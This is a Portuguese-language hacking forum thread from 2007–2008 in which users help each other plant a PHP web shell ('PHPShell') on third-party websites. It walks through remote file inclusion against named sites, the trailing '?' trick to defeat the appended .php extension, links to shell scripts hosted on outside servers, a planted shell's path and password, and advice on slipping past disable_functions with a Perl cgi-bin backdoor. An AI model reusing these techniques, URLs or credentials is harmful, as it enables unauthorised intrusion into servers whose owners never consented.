PHPShell [backdoor]

Anonymous · 27 de December , 2007, 11:28:02 AM

Fui utilizar em um determinado site

http://www.site.com.br/modules.php?name ... killer.txt

e apareceu o seguinte

"Hi and Bye"

Mateus · 27 de December , 2007, 12:54:22 PM

faltou o caráctere "?" no final no final da url....leia o erro e vai perceber que o php ta adicionando .php no final da sua url, na hora de incluir se vc colocar o ? vai ficar http://balbalba.com/balba.php?page=http ... l.txt?.php fazendo com que o.php seja passado como varivel GET para a requisição do arquivo.txt ^^

rmoraes · 27 de December , 2007, 12:59:28 PM

Matheus,

Porém ao colocar o ? ficando deste modo rmoraes.txt? ele ocorre o erro:

Veja a imagem ai

Mateus · 27 de December , 2007, 01:13:34 PM

isso ai já erro outro erro...o secure mode deve tar on no servidor...tenta com outra cmd...a que eu mais gosto é a nst pode usar a minha em http://www.shedjsimone.ch/gallery/bjorn2.txt

rmoraes · 27 de December , 2007, 01:34:32 PM

Matheus o site está Safe-mode: OFF (secure) é com permissão para Upload
pórem quando tento executar comandos na shell volta para a pagina
inicial acho que é isto que não está deixando o backdoor injetar pode ser isto?

Site: http://www.calidadempresaria.net/main.php?mostrar=

$:-\$

Mateus · 27 de December , 2007, 02:26:10 PM

não sei se vc olhou o codigo mas logo no começo ele copia o arquivo pra dentro de bjorn.php no seu servidor...tenta aí acessar http://calidad não sei o que/bjorn.php se pedir senha a senha é meandme e se der um erro de copia no começo não ligue

branco · 27 de December , 2007, 03:36:43 PM

Quote from: "rmoraes"Matheus,

Porém ao colocar o ? ficando deste modo rmoraes.txt? ele ocorre o erro:

Veja a imagem ai ;)

Quote from: "killer.bat"Fui utilizar em um determinado site

http://www.site.com.br/modules.php?name ... killer.txt

e apareceu o seguinte

"Hi and Bye"

rsrs pelo visto o site não está vulneravel a PHP injection, e o administrador brincou com vc...

have fun !

rmoraes · 27 de December , 2007, 04:00:36 PM

Branco, muito obrigado irei salvar o backdoor aqui é econtrar um servidor
windows para testá-lo.

Branco se nao for pedir muito pode disponibilizar o codigo fonte da sua CMD
com informações sobre o servidor, para min guardar e poder usar
futuramente?

Poderia se tive tempo me indicar um backdoor para Sistemas Unix ?
que voce ja utilizou?

Vlw !!!!

branco · 27 de December , 2007, 04:16:54 PM

rmoraes, entre em http://www.calidadempresaria.net/main.p ... arkers.txt?
e salve a página no seu computador, assim terá sempre que precisar as configurações.
mas lembre-se que elas podem mudar, caso o servidor nao seja seu, o administrador pode mudar as configurações.

olha, backdoor em PHP eu nunca vi, logo nunca utilizei, mas talvez você encontre algum pela net.
se não encontrar me mande uma mp que eu darei um jeito de apressar a atualização do PHPShell para rodar em linux.

se sua vontade de obter acesso root a esse servidor for tanta, aprenda Perl, faça um backdoor e o coloque na pasta cgi-bin.

assim o seu backdoor em perl poderá executar comandos no servidor com permissao de usuário www-data

vale ressaltar que isso vai apenas "burlar" o disable_functions, assim se você utilizar uma cmd para acessar o servidor e perceber que com as funções que estao desabilitadas você nao poderá fazer muita coisa, nem adianta perder tempo com um backdoor em Perl.
em principio, tudo que o backdoor em perl pode fazer, o PHP tambem pode, a unica coisa que está nos limitando é o disable_functions.

boa sorte ^^

antes que eu me esqueça, o código de fonte da cmd pode encontrar em :
http://nershess.orgfree.com/darkers.txt
caso queira estuda-la...porem eu nao aconselho, pois fiz ela totalmente estruturada e esta muito bagunçada, como esqueci a senha do servidor nershess.orgfree.com, nem posso fazer uma atualização =\

eu estava criando outra em Ajax, até postei no darkers, só que o rapidshare expirou e eu perdi ela...agora to sem tempo pra criar outra.
tem muitas com código mais fácil de entender por ai, só procurar ^^

flws, have fun

rmoraes · 27 de December , 2007, 04:24:24 PM

Branco

Valeu mesmo cara !!! O dia quer der para terminar seu backdoor para
rodar em linux me mande um MP quando postar

Vo estudar sim.
Abraços

rmoraes · 17 de January , 2008, 01:23:54 PM

branco ,

Eu novamente aqui te dando trabalho ... estou com acesso a um servidor Iss 5.0 e tenho permissão de upload, será que se eu upar este backdoor ele irá se conectar? :D

vlw

branco · 17 de January , 2008, 03:13:30 PM

se o servidor tiver rodando php :P

até

PHPShell [backdoor]

Anonymous